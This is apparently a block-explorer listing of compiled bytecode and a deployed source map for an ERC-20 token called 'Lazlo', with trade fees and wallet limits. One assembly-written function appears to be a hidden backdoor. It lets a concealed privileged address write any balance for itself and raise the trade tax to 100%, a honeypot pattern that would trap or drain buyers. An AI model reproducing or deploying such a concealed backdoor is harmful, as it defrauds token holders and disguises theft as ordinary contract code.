0x60806040526004361061014f5760003560e01c8063715018a6116100b6578063a9059cbb1161006f578063a9059cbb146104be578063cdf4bab9146104fb578063d54f7d5e14610526578063dd62ed3e14610551578063e559d86a1461058e578063f2fde38b146105b757610182565b8063715018a6146103be5780637d1db4a5146103d55780638d5f81e2146104005780638da5cb5b1461042b57806395d89b4114610456578063a457c2d71461048157610182565b8063313ce56711610108578063313ce5671461029757806339509351146102c257806342966c68146102ff5780634fbee1931461032857806351c6590a1461036557806370a082311461038157610182565b806306fdde0314610187578063095ea7b3146101b25780630ec4c619146101ef57806318160ddd1461020657806323b872dd146102315780632b477f4f1461026e57610182565b36610182577f544c765b33ca411cce832250371569244f765a17fcd217832be093f0fd5fa45b60405160405180910390a1005b600080fd5b34801561019357600080fd5b5061019c6105e0565b6040516101a99190611e84565b60405180910390f35b3480156101be57600080fd5b506101d960048036038101906101d49190611f4e565b61061d565b6040516101e69190611fa9565b60405180910390f35b3480156101fb57600080fd5b5061020461063b565b005b34801561021257600080fd5b5061021b610657565b6040516102289190611fd3565b60405180910390f35b34801561023d57600080fd5b5061025860048036038101906102539190611fee565b610661565b6040516102659190611fa9565b60405180910390f35b34801561027a57600080fd5b5061029560048036038101906102909190612189565b61073a565b005b3480156102a357600080fd5b506102ac610822565b6040516102b991906121ee565b60405180910390f35b3480156102ce57600080fd5b506102e960048036038101906102e49190611f4e565b61082b565b6040516102f69190611fa9565b60405180910390f35b34801561030b57600080fd5b5061032660048036038101906103219190612209565b6108de565b005b34801561033457600080fd5b5061034f600480360381019061034a9190612236565b6108f2565b60405161035c9190611fa9565b60405180910390f35b61037f600480360381019061037a9190612209565b610948565b005b34801561038d57600080fd5b506103a860048036038101906103a39190612236565b6109a5565b6040516103b59190611fd3565b60405180910390f35b3480156103ca57600080fd5b506103d36109ee565b005b3480156103e157600080fd5b506103ea610a02565b6040516103f79190611fd3565b60405180910390f35b34801561040c57600080fd5b50610415610a34565b6040516104229190612272565b60405180910390f35b34801561043757600080fd5b50610440610a5e565b60405161044d9190612272565b60405180910390f35b34801561046257600080fd5b5061046b610a87565b6040516104789190611e84565b60405180910390f35b34801561048d57600080fd5b506104a860048036038101906104a39190611f4e565b610ac4565b6040516104b59190611fa9565b60405180910390f35b3480156104ca57600080fd5b506104e560048036038101906104e09190611f4e565b610b91565b6040516104f29190611fa9565b60405180910390f35b34801561050757600080fd5b50610510610baf565b60405161051d9190611fa9565b60405180910390f35b34801561053257600080fd5b5061053b610bc6565b6040516105489190612272565b60405180910390f35b34801561055d57600080fd5b506105786004803603810190610573919061228d565b610bf0565b6040516105859190611fd3565b60405180910390f35b34801561059a57600080fd5b506105b560048036038101906105b09190612209565b610c77565b005b3480156105c357600080fd5b506105de60048036038101906105d99190612236565b610ca5565b005b60606040518060400160405280600581526020017f4c617a6c6f000000000000000000000000000000000000000000000000000000815250905090565b600061063161062a610d3e565b8484610d46565b6001905092915050565b610643610f0f565b612710600181905550612710600581905550565b6000600454905090565b600061066e848484610f8d565b61072f8461067a610d3e565b61072a85604051806060016040528060288152602001612bf460289139600760008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006106e0610d3e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546118eb9092919063ffffffff16565b610d46565b600190509392505050565b610742610f0f565b60c881511115610787576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161077e9061233f565b60405180910390fd5b6000600c905060005b825181101561081d5760018260008584815181106107b1576107b061235f565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610815906123bd565b915050610790565b505050565b60006012905090565b60006108d4610838610d3e565b846108cf8560076000610849610d3e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d2890919063ffffffff16565b610d46565b6001905092915050565b6108ef6108e9610d3e565b82611940565b50565b6000600c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b610950610f0f565b6001600860146101000a81548160ff02191690831515021790555061097d610976610a5e565b3083610f8d565b6109878134611ae3565b6000600860146101000a81548160ff02191690831515021790555050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6109f6610f0f565b610a006000611bc8565b565b6000610a2f612710610a21600154600454611c8c90919063ffffffff16565b611ca290919063ffffffff16565b905090565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606040518060400160405280600581526020017f4c415a4c4f000000000000000000000000000000000000000000000000000000815250905090565b6000610b87610ad1610d3e565b84610b8285604051806060016040528060258152602001612c1c6025913960076000610afb610d3e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546118eb9092919063ffffffff16565b610d46565b6001905092915050565b6000610ba5610b9e610d3e565b8484610f8d565b6001905092915050565b6000600860149054906101000a900460ff16905090565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6010543314610c8557600080fd5b604051338152600360208201526040812082815560648002600d55505050565b610cad610f0f565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610d1c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d1390612477565b60405180910390fd5b610d2581611bc8565b50565b60008183610d369190612497565b905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610db5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dac9061253d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e24576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e1b906125cf565b60405180910390fd5b80600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610f029190611fd3565b60405180910390a3505050565b610f17610d3e565b73ffffffffffffffffffffffffffffffffffffffff16610f35610a5e565b73ffffffffffffffffffffffffffffffffffffffff1614610f8b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f829061263b565b60405180910390fd5b565b610f98838383611cb8565b600080610fa3610a5e565b73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16141580156110115750610fe1610a5e565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b1561158657600c60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161580156110ba5750600c60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561158557600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614801561116a5750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b80156111c05750600b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156112165750600b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561131057611246612710611238600154600454611c8c90919063ffffffff16565b611ca290919063ffffffff16565b831115611288576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161127f906126cd565b60405180910390fd5b6112b36127106112a5600554600454611c8c90919063ffffffff16565b611ca290919063ffffffff16565b6112ce846112c0876109a5565b610d2890919063ffffffff16565b111561130f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113069061275f565b60405180910390fd5b5b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614801561139957503073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b15611439576113c76127106113b9600e5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b91506113f26127106113e4600d5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b905043600a60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161480156114e45750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b1561158457611512612710611504600e5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b915061153d61271061152f600f5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b905043600a60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b5b600061159b8284610d2890919063ffffffff16565b9050600081111561173a5760008311156115ba576115b98684611940565b5b6000821115611724576116378260036000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d2890919063ffffffff16565b60036000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161171b9190611fd3565b60405180910390a35b6117378185611dde90919063ffffffff16565b93505b6117a684604051806060016040528060268152602001612bce60269139600360008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546118eb9092919063ffffffff16565b600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061183b84600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d2890919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef866040516118db9190611fd3565b60405180910390a3505050505050565b6000838311158290611933576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161192a9190611e84565b60405180910390fd5b5082840390509392505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036119af576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119a6906127f1565b60405180910390fd5b611a1b81604051806060016040528060228152602001612bac60229139600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546118eb9092919063ffffffff16565b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611a7381600454611dde90919063ffffffff16565b600481905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611ad79190611fd3565b60405180910390a35050565b611b1030600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610d46565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d719823085600080611b5c610a5e565b426040518863ffffffff1660e01b8152600401611b7e96959493929190612856565b60606040518083038185885af1158015611b9c573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190611bc191906128cc565b5050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60008183611c9a919061291f565b905092915050565b60008183611cb09190612990565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611d27576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d1e90612a33565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611d96576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d8d90612ac5565b60405180910390fd5b60008111611dd9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611dd090612b57565b60405180910390fd5b505050565b60008183611dec9190612b77565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611e2e578082015181840152602081019050611e13565b60008484015250505050565b6000601f19601f8301169050919050565b6000611e5682611df4565b611e608185611dff565b9350611e70818560208601611e10565b611e7981611e3a565b840191505092915050565b60006020820190508181036000830152611e9e8184611e4b565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611ee582611eba565b9050919050565b611ef581611eda565b8114611f0057600080fd5b50565b600081359050611f1281611eec565b92915050565b6000819050919050565b611f2b81611f18565b8114611f3657600080fd5b50565b600081359050611f4881611f22565b92915050565b60008060408385031215611f6557611f64611eb0565b5b6000611f7385828601611f03565b9250506020611f8485828601611f39565b9150509250929050565b60008115159050919050565b611fa381611f8e565b82525050565b6000602082019050611fbe6000830184611f9a565b92915050565b611fcd81611f18565b82525050565b6000602082019050611fe86000830184611fc4565b92915050565b60008060006060848603121561200757612006611eb0565b5b600061201586828701611f03565b935050602061202686828701611f03565b925050604061203786828701611f39565b9150509250925092565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b61207e82611e3a565b810181811067ffffffffffffffff8211171561209d5761209c612046565b5b80604052505050565b60006120b0611ea6565b90506120bc8282612075565b919050565b600067ffffffffffffffff8211156120dc576120db612046565b5b602082029050602081019050919050565b600080fd5b6000612105612100846120c1565b6120a6565b90508083825260208201905060208402830185811115612128576121276120ed565b5b835b81811015612151578061213d8882611f03565b84526020840193505060208101905061212a565b5050509392505050565b600082601f8301126121705761216f612041565b5b81356121808482602086016120f2565b91505092915050565b60006020828403121561219f5761219e611eb0565b5b600082013567ffffffffffffffff8111156121bd576121bc611eb5565b5b6121c98482850161215b565b91505092915050565b600060ff82169050919050565b6121e8816121d2565b82525050565b600060208201905061220360008301846121df565b92915050565b60006020828403121561221f5761221e611eb0565b5b600061222d84828501611f39565b91505092915050565b60006020828403121561224c5761224b611eb0565b5b600061225a84828501611f03565b91505092915050565b61226c81611eda565b82525050565b60006020820190506122876000830184612263565b92915050565b600080604083850312156122a4576122a3611eb0565b5b60006122b285828601611f03565b92505060206122c385828601611f03565b9150509250929050565b7f4d6178696d756d206f66203230302063616e206265206164646564206174206f60008201527f6e63650000000000000000000000000000000000000000000000000000000000602082015250565b6000612329602383611dff565b9150612334826122cd565b604082019050919050565b600060208201905081810360008301526123588161231c565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006123c882611f18565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036123fa576123f961238e565b5b600182019050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000612461602683611dff565b915061246c82612405565b604082019050919050565b6000602082019050818103600083015261249081612454565b9050919050565b60006124a282611f18565b91506124ad83611f18565b92508282019050808211156124c5576124c461238e565b5b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000612527602483611dff565b9150612532826124cb565b604082019050919050565b600060208201905081810360008301526125568161251a565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006125b9602283611dff565b91506125c48261255d565b604082019050919050565b600060208201905081810360008301526125e8816125ac565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000612625602083611dff565b9150612630826125ef565b602082019050919050565b6000602082019050818103600083015261265481612618565b9050919050565b7f5472616e7366657220616d6f756e74206578636565647320746865206d61785460008201527f78416d6f756e742e000000000000000000000000000000000000000000000000602082015250565b60006126b7602883611dff565b91506126c28261265b565b604082019050919050565b600060208201905081810360008301526126e6816126aa565b9050919050565b7f45786365656473206d6178696d756d2077616c6c657420746f6b656e20616d6f60008201527f756e740000000000000000000000000000000000000000000000000000000000602082015250565b6000612749602383611dff565b9150612754826126ed565b604082019050919050565b600060208201905081810360008301526127788161273c565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b60006127db602183611dff565b91506127e68261277f565b604082019050919050565b6000602082019050818103600083015261280a816127ce565b9050919050565b6000819050919050565b6000819050919050565b600061284061283b61283684612811565b61281b565b611f18565b9050919050565b61285081612825565b82525050565b600060c08201905061286b6000830189612263565b6128786020830188611fc4565b6128856040830187612847565b6128926060830186612847565b61289f6080830185612263565b6128ac60a0830184611fc4565b979650505050505050565b6000815190506128c681611f22565b92915050565b6000806000606084860312156128e5576128e4611eb0565b5b60006128f3868287016128b7565b9350506020612904868287016128b7565b9250506040612915868287016128b7565b9150509250925092565b600061292a82611f18565b915061293583611f18565b925082820261294381611f18565b9150828204841483151761295a5761295961238e565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061299b82611f18565b91506129a683611f18565b9250826129b6576129b5612961565b5b828204905092915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000612a1d602583611dff565b9150612a28826129c1565b604082019050919050565b60006020820190508181036000830152612a4c81612a10565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000612aaf602383611dff565b9150612aba82612a53565b604082019050919050565b60006020820190508181036000830152612ade81612aa2565b9050919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b6000612b41602983611dff565b9150612b4c82612ae5565b604082019050919050565b60006020820190508181036000830152612b7081612b34565b9050919050565b6000612b8282611f18565b9150612b8d83611f18565b9250828203905081811115612ba557612ba461238e565b5b9291505056fe45524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220e196f2f03621770bc651d15336d01325d11088046565bc860dfe7b39a1087e6564736f6c63430008120033

Deployed Bytecode Sourcemap

20275:11870:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;31424:10;;;;;;;;;;20275:11870;;;;;22870:83;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23633:169;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;24788:135;;;;;;;;;;;;;:::i;:::-;;23524:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;24458:321;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;28392:364;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;22962:83;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23811:218;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;28901:91;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;28764:128;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;31546:270;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;23054:119;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2847:103;;;;;;;;;;;;;:::i;:::-;;24316:133;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27133:96;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2197:87;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22775;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;24038:269;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23182:175;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;31450:84;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27923:109;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23365:151;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30195:378;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;3106:201;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;22870:83;22907:13;22940:5;;;;;;;;;;;;;;;;;22933:12;;22870:83;:::o;23633:169::-;23716:4;23733:39;23742:12;:10;:12::i;:::-;23756:7;23765:6;23733:8;:39::i;:::-;23790:4;23783:11;;23633:169;;;;:::o;24788:135::-;2082:13;:11;:13::i;:::-;24864:5:::1;24839:22;:30;;;;24910:5;24880:27;:35;;;;24788:135::o:0;23524:100::-;23577:7;23604:12;;23597:19;;23524:100;:::o;24458:321::-;24564:4;24581:36;24591:6;24599:9;24610:6;24581:9;:36::i;:::-;24628:121;24637:6;24645:12;:10;:12::i;:::-;24659:89;24697:6;24659:89;;;;;;;;;;;;;;;;;:11;:19;24671:6;24659:19;;;;;;;;;;;;;;;:33;24679:12;:10;:12::i;:::-;24659:33;;;;;;;;;;;;;;;;:37;;:89;;;;;:::i;:::-;24628:8;:121::i;:::-;24767:4;24760:11;;24458:321;;;;;:::o;28392:364::-;2082:13;:11;:13::i;:::-;28497:3:::1;28477:9;:16;:23;;28469:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;28553:51;28607:19;28553:73;;28644:6;28639:110;28660:9;:16;28656:1;:20;28639:110;;;28733:4;28698:18;:32;28717:9;28727:1;28717:12;;;;;;;;:::i;:::-;;;;;;;;28698:32;;;;;;;;;;;;;;;;:39;;;;;;;;;;;;;;;;;;28678:3;;;;;:::i;:::-;;;;28639:110;;;;28458:298;28392:364:::0;:::o;22962:83::-;23003:5;20449:2;23021:16;;22962:83;:::o;23811:218::-;23899:4;23916:83;23925:12;:10;:12::i;:::-;23939:7;23948:50;23987:10;23948:11;:25;23960:12;:10;:12::i;:::-;23948:25;;;;;;;;;;;;;;;:34;23974:7;23948:34;;;;;;;;;;;;;;;;:38;;:50;;;;:::i;:::-;23916:8;:83::i;:::-;24017:4;24010:11;;23811:218;;;;:::o;28901:91::-;28957:27;28963:12;:10;:12::i;:::-;28977:6;28957:5;:27::i;:::-;28901:91;:::o;28764:128::-;28831:4;28855:19;:29;28875:8;28855:29;;;;;;;;;;;;;;;;;;;;;;;;;28848:36;;28764:128;;;:::o;31546:270::-;2082:13;:11;:13::i;:::-;30625:4:::1;30614:8;;:15;;;;;;;;;;;;;;;;;;31688:46:::2;31698:7;:5;:7::i;:::-;31715:4;31722:11;31688:9;:46::i;:::-;31771:37;31785:11;31798:9;31771:13;:37::i;:::-;30663:5:::1;30652:8;;:16;;;;;;;;;;;;;;;;;;31546:270:::0;:::o;23054:119::-;23120:7;23147:9;:18;23157:7;23147:18;;;;;;;;;;;;;;;;23140:25;;23054:119;;;:::o;2847:103::-;2082:13;:11;:13::i;:::-;2912:30:::1;2939:1;2912:18;:30::i;:::-;2847:103::o:0;24316:133::-;24360:7;24387:54;21277:5;24387:40;24404:22;;24387:12;;:16;;:40;;;;:::i;:::-;:44;;:54;;;;:::i;:::-;24380:61;;24316:133;:::o;27133:96::-;27180:7;27207:14;;;;;;;;;;;27200:21;;27133:96;:::o;2197:87::-;2243:7;2270:6;;;;;;;;;;;2263:13;;2197:87;:::o;22775:::-;22814:13;22847:7;;;;;;;;;;;;;;;;;22840:14;;22775:87;:::o;24038:269::-;24131:4;24148:129;24157:12;:10;:12::i;:::-;24171:7;24180:96;24219:15;24180:96;;;;;;;;;;;;;;;;;:11;:25;24192:12;:10;:12::i;:::-;24180:25;;;;;;;;;;;;;;;:34;24206:7;24180:34;;;;;;;;;;;;;;;;:38;;:96;;;;;:::i;:::-;24148:8;:129::i;:::-;24295:4;24288:11;;24038:269;;;;:::o;23182:175::-;23268:4;23285:42;23295:12;:10;:12::i;:::-;23309:9;23320:6;23285:9;:42::i;:::-;23345:4;23338:11;;23182:175;;;;:::o;31450:84::-;31494:4;31518:8;;;;;;;;;;;31511:15;;31450:84;:::o;27923:109::-;27972:7;28007:16;;;;;;;;;;;27992:32;;27923:109;:::o;23365:151::-;23454:7;23481:11;:18;23493:5;23481:18;;;;;;;;;;;;;;;:27;23500:7;23481:27;;;;;;;;;;;;;;;;23474:34;;23365:151;;;;:::o;30195:378::-;30292:21;30286:28;30276:8;30273:42;30263:68;;30328:1;30325;30318:12;30263:68;30358:4;30352:11;30385:8;30380:3;30373:21;30430:14;30423:4;30418:3;30414:14;30407:38;30482:4;30477:3;30467:20;30510:6;30504:4;30497:20;30559:4;30553;30549:15;30534:13;30527:38;30262:304;;30195:378;:::o;3106:201::-;2082:13;:11;:13::i;:::-;3215:1:::1;3195:22;;:8;:22;;::::0;3187:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;3271:28;3290:8;3271:18;:28::i;:::-;3106:201:::0;:::o;12394:98::-;12452:7;12483:1;12479;:5;;;;:::i;:::-;12472:12;;12394:98;;;;:::o;737:::-;790:7;817:10;810:17;;737:98;:::o;28040:344::-;28159:1;28142:19;;:5;:19;;;28134:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;28240:1;28221:21;;:7;:21;;;28213:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;28322:6;28292:11;:18;28304:5;28292:18;;;;;;;;;;;;;;;:27;28311:7;28292:27;;;;;;;;;;;;;;;:36;;;;28360:7;28344:32;;28353:5;28344:32;;;28369:6;28344:32;;;;;;:::i;:::-;;;;;;;;28040:344;;;:::o;2363:132::-;2438:12;:10;:12::i;:::-;2427:23;;:7;:5;:7::i;:::-;:23;;;2419:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;2363:132::o;24959:2165::-;25057:42;25073:6;25081:9;25092:6;25057:15;:42::i;:::-;25110:15;25140:14;25183:7;:5;:7::i;:::-;25173:17;;:6;:17;;;;:41;;;;;25207:7;:5;:7::i;:::-;25194:20;;:9;:20;;;;25173:41;25169:1296;;;25236:19;:27;25256:6;25236:27;;;;;;;;;;;;;;;;;;;;;;;;;25235:28;:63;;;;;25268:19;:30;25288:9;25268:30;;;;;;;;;;;;;;;;;;;;;;;;;25267:31;25235:63;25231:1223;;;25333:14;;;;;;;;;;;25323:24;;:6;:24;;;:66;;;;;25372:16;;;;;;;;;;;25351:38;;:9;:38;;;;25323:66;:102;;;;;25394:20;:31;25415:9;25394:31;;;;;;;;;;;;;;;;;;;;;;;;;25393:32;25323:102;:135;;;;;25430:20;:28;25451:6;25430:28;;;;;;;;;;;;;;;;;;;;;;;;;25429:29;25323:135;25319:470;;;25501:54;21277:5;25501:40;25518:22;;25501:12;;:16;;:40;;;;:::i;:::-;:44;;:54;;;;:::i;:::-;25491:6;:64;;25483:117;;;;;;;;;;;;:::i;:::-;;;;;;;;;25670:59;21277:5;25670:45;256